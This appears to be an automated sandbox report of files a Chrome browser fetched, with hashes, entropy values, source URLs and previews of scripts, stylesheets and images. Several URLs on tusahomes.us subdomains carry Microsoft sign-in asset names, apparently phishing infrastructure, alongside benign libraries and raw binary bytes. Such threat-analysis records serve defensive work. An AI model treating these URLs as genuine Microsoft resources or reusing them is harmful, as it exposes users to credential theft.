                                                                SHA1:2C09A106369717E0859DAB42FA8F1EFFC7D3DC39
                                                                SHA-256:ED57A2DE796D508BAA5F88217229D37B2942658F724BDE991F596436FE42892C
                                                                SHA-512:F01FBB6354F7FBA6C0D462C03C3CBCD9B10A19339B4EED1327407EE242745B02DEED2CC430B67765F43AF3D444B428383939419563D7EA3E62CA9B627B1F6FBF
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://126d7c624ad3410bb741b30b9bf3d28f.tusahomes.us/shared/1.0/content/js/BssoInterrupt_Core_9810YxmrLqOR1rQ4anyNMg2.js
                                                                Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://21f6d35d7587443b8bb832dc786aaf9e.tusahomes.us/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function t(t){for(var n,r,i=t
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                Category:dropped
                                                                Size (bytes):2672
                                                                Entropy (8bit):6.640973516071413
                                                                Encrypted:false
                                                                SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                MD5:166DE53471265253AB3A456DEFE6DA23
                                                                SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (3909), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):3909
                                                                Entropy (8bit):5.105735783446576
                                                                Encrypted:false
                                                                SSDEEP:48:Ma4PsTGONOugDa+AZ5uvUiTCarY2VOBFqfcoj8QqL5j+AZ5C5Db:7twueLAjDiuORo2koj8Qq9yAjw3
                                                                MD5:50B4E319ED87977B52F33EF55EB23A45
                                                                SHA1:1549A85A3389FEE75DFD67F3F212EED219705E78
                                                                SHA-256:5F984F8E0FAF63AB44644666A1B3FDE2D45DFBBCE0B163152464D9736875370E
                                                                SHA-512:8300E5B8420806EA08F8927569B527B3796F91CEDEA5B54F82CF6BBA8EA21EC3780245B12D6BDA545A7C8F98AA5F3BB402DE7B7693EE07612158B4ECD68B2929
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://static.pagewizcdn.com/LPStaticResources/fancybox/source/jquery.fancybox.css?v=18.01.24
                                                                Preview:/*! fancyBox v2.1.5 fancyapps.com | fancyapps.com/fancybox/#license */.fancybox-wrap,.fancybox-skin,.fancybox-outer,.fancybox-inner,.fancybox-image,.fancybox-wrap iframe,.fancybox-wrap object,.fancybox-nav,.fancybox-nav span,.fancybox-tmp{padding:0;margin:0;border:0;outline:0;vertical-align:top}.fancybox-wrap{position:absolute;top:0;left:0;z-index:8020}.fancybox-skin{position:relative;background:#f9f9f9;color:#444;text-shadow:none;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px}.fancybox-opened{z-index:8030}.fancybox-opened .fancybox-skin{-webkit-box-shadow:0 10px 25px rgba(0,0,0,0.5);-moz-box-shadow:0 10px 25px rgba(0,0,0,0.5);box-shadow:0 10px 25px rgba(0,0,0,0.5)}.fancybox-outer,.fancybox-inner{position:relative}.fancybox-inner{overflow:hidden}.fancybox-type-iframe .fancybox-inner{-webkit-overflow-scrolling:touch}.fancybox-error{color:#444;font:14px/20px "Helvetica Neue",Helvetica,Arial,sans-serif;margin:0;padding:15px;white-space:nowrap}.fancybox-image,.fancybox-
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                Category:downloaded
                                                                Size (bytes):3620
                                                                Entropy (8bit):6.867828878374734
                                                                Encrypted:false
                                                                SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, original size modulo 2^32 1592
                                                                Category:downloaded
                                                                Size (bytes):621
                                                                Entropy (8bit):7.6770058072183405
                                                                Encrypted:false
                                                                SSDEEP:12:XDQ7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:X86qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                MD5:ECC8894D3791BEDDB4E0226F8DAB065A
                                                                SHA1:6510EB51E76A49746C526E432455549B50DE5AF1
                                                                SHA-256:64C8C0A9EFBC27AD86EAEC90465B75C52AE8CD68F7E76FC9431DC6AE66072AC3
                                                                SHA-512:02B20BE98C22EBF7886FE68008C4ED42E3F8FF6ADC8DD7BC1A43A8C4F6FD56CC932EFC5500249A4FAA5024574A841AD10FC8DDB8221CB7226E0E16DEA63F7052
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                                Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (24003)
                                                                Category:downloaded
                                                                Size (bytes):24269
                                                                Entropy (8bit):5.382966372462796
                                                                Encrypted:false
                                                                SSDEEP:384:zH3cHNuozrNOQuMobVTWvAoMoc1mWBHI6QQEof/8r:LcHNbXhuMSeAoMonWWHQp8r
                                                                MD5:4569927B905E422C16E80046C926DE6F
                                                                SHA1:4B9C22EA1CAB464BA9D1E8F9AD602BD0F7545235
                                                                SHA-256:6F2B94B6A9CD8822A8C8CC7B7273802F4BBD0CDEC2BE07CF16BDB186C7B7ED32
                                                                SHA-512:3A89891F7844C517CE90B098AAF329D9A75902A396E157A752F13149AE75028F734E1A9A77B8EAAC7608C266B3C153BB96156C0F8EF8E3D6D56E9A87A2EB23AD
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://static.pagewizcdn.com/LPStaticResources/fancybox/source/jquery.fancybox.js?v=18.01.24
                                                                Preview:/*!. * fancyBox - jQuery Plugin. * version: 2.1.5 (Fri, 14 Jun 2013). * @requires jQuery v1.6 or later. *. * Examples at http://fancyapps.com/fancybox/. * License: www.fancyapps.com/fancybox/#license. *. * Copyright 2012 Janis Skarnelis - janis@fancyapps.com. *. */.(function(l,o,i,e){var p=i("html"),d=i(l),a=i(o),q=i.fancybox=function(){q.open.apply(this,arguments)},k=navigator.userAgent.match(/msie/i),c=null,f=o.createTouch!==e,j=function(r){return r&&r.hasOwnProperty&&r instanceof i},b=function(r){return r&&i.type(r)==="string"},m=function(r){return b(r)&&r.indexOf("%")>0},h=function(r){return(r&&!(r.style.overflow&&r.style.overflow==="hidden")&&((r.clientWidth&&r.scrollWidth>r.clientWidth)||(r.clientHeight&&r.scrollHeight>r.clientHeight)))},n=function(t,s){var r=parseInt(t,10)||0;if(s&&m(t)){r=q.getViewport()[s]/100*r}return Math.ceil(r)},g=function(r,s){return n(r,s)+"px"};i.extend(q,{version:"2.1.5",defaults:{padding:15,margin:20,width:800,height:600,minWidth:100,minHeight:100,max
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (17926), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):17929
                                                                Entropy (8bit):5.093001987137562
                                                                Encrypted:false
                                                                SSDEEP:192:Z4WpTKKVcJfiS6b54io1ttTxk5TMqgUVTQiABHX:Z4WpTKKVcY4ipLIX
                                                                MD5:8146D2DC09285EBD7C37B596ED7C3E63
                                                                SHA1:CF0CF66C7299B47F4AB030DF971BD80AEFDC228F
                                                                SHA-256:2794447C65449723BB3AAF6C268440316CE9E26F39467C4FA1FD307129300C26
                                                                SHA-512:52BBE41FD3EEADCD9E2B9AD8CD56D2338798F322C48790AECADEBBEEB2B7B6713C53890492AE9E2B1C75593E46EED4167B2E9C6B3ABEEDC7E89161378DF7D7C3
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://static.pagewizcdn.com/LPStaticResources/style2/lpCommon.css?v=18.01.24
                                                                Preview:. #frmpost{border-width:0}iframe[name='google_conversion_frame']{position:absolute}input,select,textarea{box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box}a img{border-width:0}.draggable[etype="Headline"],.draggable.Headline{word-wrap:break-word}.draggable[etype="Htmlembed"] iframe,.draggable.Htmlembed iframe{border-width:0}.draggable[etype="Image"] img,.draggable.Image img{border-radius:inherit;-webkit-border-radius:inherit;-moz-border-radius:inherit}table{color:inherit;font-size:12px}body{font-family:Arial;text-align:left;direction:ltr;margin:0;padding:0;border:0;outline:0;font-size:12px;vertical-align:baseline;z-index:1;color:inherit;line-height:normal;letter-spacing:normal}div,p{margin:0}.draggable{font-size:12px;border:1px dashed Transparent;position:absolute}#ElamentArea{z-index:0}p,th,td{line-height:normal}.TopHolder{margin-bottom:10px}.TopHolder label{float:inherit;text-align:inherit;font-family:Arial;font-size:12px;width:80px}.TopHolder div.Inlin
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (10861), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):10861
                                                                Entropy (8bit):5.133711004239026
                                                                Encrypted:false
                                                                SSDEEP:192:dhjd6hAG9I+suaK9hvUVIpDhZMhOlrU0UcUzsmppfp1p8/7KYSYeYl6W6i6a:x6hKzohvM0gbzzsmO/7K5nmNHh
                                                                MD5:F74E9D8A91A5C96608A52921FDECAC55
                                                                SHA1:80DE22CACE75C27F95C08725EC86D1D4869D6E6B
                                                                SHA-256:C22E8FF1FFFD90F1A7CFFEDAE0CE1F382FE773DDD3D45B6225FAF77C0E86B64D
                                                                SHA-512:8D37A807738EC210F4ACE181959A505AAE0C68FE708D75762382D89020466C2A244274F89464D6B9318E1E7F094A1930B43AF95BE26B7BE1563A9FA77C45C9A2
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://static.pagewizcdn.com/LPStaticResources/style2/sweet-alert.css?v=18.01.24
                                                                Preview:@import url(//fonts.googleapis.com/css?family=Open+Sans:400,600,700,300);.sweet-overlay{background-color:rgba(0,0,0,0.4);position:fixed;left:0;right:0;top:0;bottom:0;display:none;z-index:1000}.sweet-alert{background-color:white;font-family:'Open Sans',sans-serif;width:478px;padding:17px;border-radius:5px;text-align:center;position:fixed;left:50%;top:50%;margin-left:-256px;margin-top:-200px;overflow:hidden;display:none;z-index:2000}@media all and (max-width:540px){.sweet-alert{width:auto;margin-left:0;margin-right:0;left:15px;right:15px}}.sweet-alert h2{color:#575757;font-size:30px;text-align:center;font-weight:600;text-transform:none;position:relative;margin:25px 0;padding:0;line-height:25px;display:block}.sweet-alert p{color:#797979;font-size:16px;text-align:center;font-weight:300;position:relative;margin:0;padding:0;line-height:normal}.sweet-alert button{background-color:#aedef4;color:white;border:0;box-shadow:none;font-size:17px;font-weight:500;border-radius:5px;padding:10px 32px;ma
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 9392
                                                                Category:downloaded
                                                                Size (bytes):3140
                                                                Entropy (8bit):7.836413486995331
                                                                Encrypted:false
                                                                SSDEEP:48:XahhK7P6jRim3xiF687MeXtEZeuU89dxN4nkclssfx3eZDZsPLh6tKmjWHNNvUY8:KbK7P6jCY87MctcJ2nSY34JZRK4
                                                                MD5:34491FF506A3AD213614F16091D4226B
                                                                SHA1:2446934F6452C6D70C36FF43FAEB0582C88B8A23
                                                                SHA-256:79F1983C1B3E923FDAD7B8A2490C806BDEBF2532DD06C8E56359AD2BA1E144A2
                                                                SHA-512:9BECABA9FB3A00DFC993A95C3921E4B3377C4BFBD81A963DAB5038E93E02EC45F04853C5DD5DCDA0552181E782AC17DEF62B20FDF8640F1BBDB3CB053C1EC643
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:http://p1.pagewiz.net/vericastharlandclarke/
                                                                Preview:............`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"...O.<y...<M..<J...y6..m.....3y...Z.........>.V.6_....*.(.>....w..0...........G..2[.}.6....Y..iqY.W..n..W......Q......b..fe..n..Y.L.b....{...b.6....g.a0..w...f|QU.e...f<..w.....4o.....<....x...u^~.Q.^.y3.sB.$.s... .....e&.~.6..!..t...?>.[....O..u^_...?.....E...t..M..|...6k..x.].W....%....k..U.T..~.\=...Ofe1./.eC}.......wv.{.?..g....zwW>0c7.o@&2..T.4.~..8/..O.-V.. .|..6W....i...V...M....../?..'U.6m..T.~.]7W.T......?..}....u..n.......Z,*j.......'...?.:..Y..s^............_.......g...g4..j.......w.-....Y..=0.b......>..h$..-.$......w_.....5L|.....d....\....,m.....Y#..(.w..j[,.,.....i6..dW.\.IN....Z..^.q(...E^o~Q....G.o....y....qq..:.ky.'......M2..9....<}.O..j..v...?..|.*.%>......%K.}...s...3;)O.Ev........'.>]OWo...~......eu...'....>_.]..{v..rw...^.?X..V.,k..g{?.._............?.S..^WO.'....g.....J...lr..GO.T-..YQ....b.L~......o
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (10056), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):10056
                                                                Entropy (8bit):5.071826862022554
                                                                Encrypted:false
                                                                SSDEEP:96:YQ54F5pc//WZtQU4HUFz+EG7ExN9MtPmHBTStR/EbsB86fJ9vL4:YxHpc//Mt/40Ht9MtQBOtNEbstJ9T4
                                                                MD5:E317345783CF56C2EB038E728020AC05
                                                                SHA1:042FB5977EAEB120821C79341F5447F2BDEA5A4D
                                                                SHA-256:6E54ED244944C4EEFBC29B8F27928B6F21944AC67DEC01C80AFCBC65863B74C0
                                                                SHA-512:BC62F8C127EA2F94C69E60C6759A928A22D3F0AC03946D21591D9E8C4A1EDC04A51C0E0B40B391641B6789D58F07A51B9359DB1BD285DDE083E72D4987EC999A
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://static.pagewizcdn.com/LPStaticResources/bootstrap.min.js?v=18.01.24
                                                                Preview:!function(a){a(function(){a.support.transition=function(){var b=function(){var g=document.createElement("bootstrap"),h={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd",msTransition:"MSTransitionEnd",transition:"transitionend"},c;for(c in h){if(g.style[c]!==undefined){return h[c]}}}();return b&&{end:b}}()})}(window.jQuery),!function(e){function g(){var h=this,i=setTimeout(function(){h.$element.off(e.support.transition.end),a.call(h)},500);this.$element.one(e.support.transition.end,function(){clearTimeout(i),a.call(h)})}function a(h){this.$element.hide().trigger("hidden"),b.call(this)}function b(h){var k=this,i=this.$element.hasClass("fade")?"fade":"";if(this.isShown&&this.options.backdrop){var j=e.support.transition&&i;this.$backdrop=e('<div class="modal-backdrop '+i+'" />').appendTo(document.body),this.options.backdrop!="static"&&this.$backdrop.click(e.proxy(this.hide,this)),j&&this.$backdrop[0].offsetWidth,this.$backdrop.addClass("in")
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, original size modulo 2^32 3651
                                                                Category:dropped
                                                                Size (bytes):1435
                                                                Entropy (8bit):7.860223690068481
                                                                Encrypted:false
                                                                SSDEEP:24:XvstSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcN:Xv7DkpyVCGca4b//9z5oPXdbl9688qRU
                                                                MD5:DF6A7721C242813411CC6950DF40F9B3
                                                                SHA1:B2068C4A65C183AAD6FC22A44CC1FA449CD355B4
                                                                SHA-256:AA53B6DC744357B392FC57C34E516BAE465D4A6837775C137A176D599C8EA948
                                                                SHA-512:CDCFB686649F2061FE13A58841EB6A4E17F40951BA0C440C568B248E6128B6E0C4E79F95DC3EAB81286C103ED2A966F7058D22066466ADED482BF9ECAA6EA3CB
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (21430), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):21430
                                                                Entropy (8bit):5.284524641959188
                                                                Encrypted:false
                                                                SSDEEP:384:CNKpH616OEslHeW+nmsbcpwZbFeD66hhmd9DDHhCCgzMowG98TFZjBeZ47JwnCmX:v6160mHZzd9DDHhizMowTnjBea7JwnCm
                                                                MD5:EF2BF6D38E8ED68B9B790ACA63720CDD
                                                                SHA1:813F323C706677AF7E2713D9B3850468C658A4EF
                                                                SHA-256:1083F8B0E4E1A8767B33784689E57217DBFFEC5B741C34B2905E7A1E3E9C4224
                                                                SHA-512:6CF2F309AB43C0D40ED7B1F95C68C9DFAB6DBA863868F03FE706E4659889488E71CB657F1167BB20100EEA30D9DE194EC2588B57311F5D5319B67B8C79109A30
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://static.pagewizcdn.com/LPStaticResources/lpFormValidations.js?v=18.01.24
                                                                Preview:var jsonFormFields,KeyValueFormFields,ConversionURL;function updateUI(){}function pwInit(){try{jsonFormFields=getCookie("FormFields")}catch(err){return}if(null!=jsonFormFields)try{jsonFormFields=$.evalJSON(jsonFormFields.replace(/jsonFormFields=/,""))}catch(err){return}}function ShowLoadingLayer(_text){$("body").prepend('<div id="SaveMask" class="loading-maskPages"><span>'+_text+"</span></div>"),$(".loading-maskPages").height($(document).height())}function HideLoadingLayer(){$("#SaveMask").remove()}function fireLinkClickEvent(_linkObject,e){if(null==clickthroughs_objects[$(_linkObject).attr("id")])return!0;var saveAsConversion=clickthroughs_objects[$(_linkObject).attr("id")].save_as_conversion,linkConversionCode=clickthroughs_objects[$(_linkObject).attr("id")].conversion_code,linkType=clickthroughs_objects[$(_linkObject).attr("id")].type;"telephone"==linkType&&1==saveAsConversion&&""!=linkConversionCode&&e.preventDefault(),$.ajax({url:location.protocol+"//"+document.domain+"/Handler/Cl
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, original size modulo 2^32 15790
                                                                Category:downloaded
                                                                Size (bytes):5566
                                                                Entropy (8bit):7.961351806864699
                                                                Encrypted:false
                                                                SSDEEP:96:DJfPXM9eKiBp16PSdGmucDeiT2GaHuVs+/2oZM8fYnK8qmaRSLUyqiDbk7QtOF6u:DJf4W3dGmuJiT2DON2oCXK8qmaTyq7QC
                                                                MD5:C6A719ADDDDC59A90576D44A1AD20B5D
                                                                SHA1:E34451E7E4A027BB823804985C6CB4293E49C034
                                                                SHA-256:C32B4AD16CEF39FE998DFCE1ACF69FD5B45ED67AFD72D1C93991611617AEE50F
                                                                SHA-512:FF1BFF2B61F965C47C57A281BB9AE1790567152671ED3B26E2A96AED6EC9288B35598D95594B7550BDC9BBE0AA757EF1476B1360DDDC758FA10D9C7BC066B3F3
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_268b957e4bf672b8fe6b.js
                                                                Preview:...........[kw.H..>.Bh..i..dr.y4>....;..<..$.#P....Q.c.....%. .3..$..]]]]]....U.A..v..?Z.sv....Z.C.].....5...6..../...p..+..E..%....$..7.B....w.m.Dc-.q-N.o...-.E.E=.DS......$.i.+..~.l.......3.<J.0J.>........k...6....v...HD.TKx..w.DL0.....k... J.......a.r..... ....p ...q@?"....Mk.0.Y."...u..4.f.$.~u.?.j..X.}h|..$x.~j..S..H..-.x.If..]..1.D0.......pq.0.|...y\...4....y2.q.Fq...[.|..n.b.i.D......xqt.........Fi..............7?......{.........~.V:..(.saM..M..+p..-......x.M(...v5.H...]?..*^Pk.........>R....._.".:.........^..o...c.dl>.......?.....^.xk.&a..ep.2a>..OG./L..ql...#..x.h27C..Nb.......Y.....Ox2k.......rI. +...3. .x...m...P^q..$H..CmH...A3p..$.Pk.\..:$qL8..7..R.[Rv......[a.. ....w.l...._..!..!.<..1...."...Gzo.d(...z\.Bd."R..n.g..@..<..W,`C.R...,..U..?..-.%yu..h+.i..>..['..$../...c}7t....+zjQ8....AQK...?L..<..Y./.{..m.Y..{...h...g....lV'\W8...7.sV......DT......,.......E....|..{....)../.u...{..<!....n~.v...|.Cj....V.^s..N...i...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 786 x 154, 8-bit/color RGBA, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):100011
                                                                Entropy (8bit):7.965757412534382
                                                                Encrypted:false
                                                                SSDEEP:1536:5vpVlMq6iH49ZuliHDtaEVK6UruuQouAhLDeQdgOsXlDg7wiVtJIb+gGDG4bWC5:5hDMqkIIDPYuufOQyTVDSnSGgC5
                                                                MD5:962CF5BCD8A6984A323944951DD49F06
                                                                SHA1:375BE4DE709A04D072E185CC859E04AA597C5E31
                                                                SHA-256:CC143FC6F88D1B0043BCA954FC0F49C18BD63775EAFE5B9A5E65C7EC3EC1DC7F
                                                                SHA-512:758DE5E3BB1F078F9DDCEEF8CF5A011ED658F999CCE217C0D36984433F52F943086693E5B509AEE3679351887EF23D01411BF7F1369EF00341C14FF8334C3134
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:.PNG........IHDR.............=.~....>iCCPICC Profile..H..W.XS...[....B..z.D....B..7.!..J...b/...]T....(X.....E...........u_...........s..@.8W,.C5....J.B..).i.R.@.. .*p........m..w{w.zC..(..g..5M.......q.........*.XR..Q.[L...0l@[...x..g)p..g(...OB...6.T.\.$...K.g...Z...".P..:.b....|..!..>b.e...t....1...f.a.\..(,..q.......'..a..5[..'.3.....2L..W.........|.?.(%[....G.x.lX3...3............%..)..@.W.:EX.I.X....x..&..8e,.!S.f)..\.<.,.}in"K..:[.Q.cj.....S .,.&EA...SAn|..gtq6;j.G"...o.q.@.....2%.qJ......b....(%.W...........s...D..A.AAJ..\... ..g.Qb.R.0 N1....b.... /D.C.ZP....'......3.1..<...nX.".|...l...@.[...r......^)z...H@...G%38"Y.#..xP...H......{...._.X...d.{..#r....A8..R.(.P.$..2..D......&.... ..aA&B.H.#2..=.A.@b(1.h...7.......L.sp....O.....k..........]P?XY...k.[CM7<....P.....#...p?....le..0~....~..J?.3.%...?.T.Ws.R.....(r...7{..........=...~..v.;......k...v........5.-N.O....#....U.........P0E......aVv!......G.s..pqvq.@.}Q.......n.wn................>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, original size modulo 2^32 1864
                                                                Category:downloaded
                                                                Size (bytes):673
                                                                Entropy (8bit):7.6584200238076905
                                                                Encrypted:false
                                                                SSDEEP:12:XRt8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:X+UVpkNK0Rwid81p6btk7LqZ6D
                                                                MD5:2D2CBA7D7DC75F3BA9DC756738D41A6E
                                                                SHA1:F87FD26066ED5E52A65DEE0ED2D581D3C3EA15AC
                                                                SHA-256:00E21864CF1BC70302EBB5B496C6C471A7DA8CBF600630B478A3E2376ED20EA2
                                                                SHA-512:46F17658CA247C02F612213025350390D8F62179C8DE26725EB17F5CCFAFDD63F2149DA1765D3C2F3A12FE85EF29CAC58457B0D5C2F8DA8DED6E1231A35F199D
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
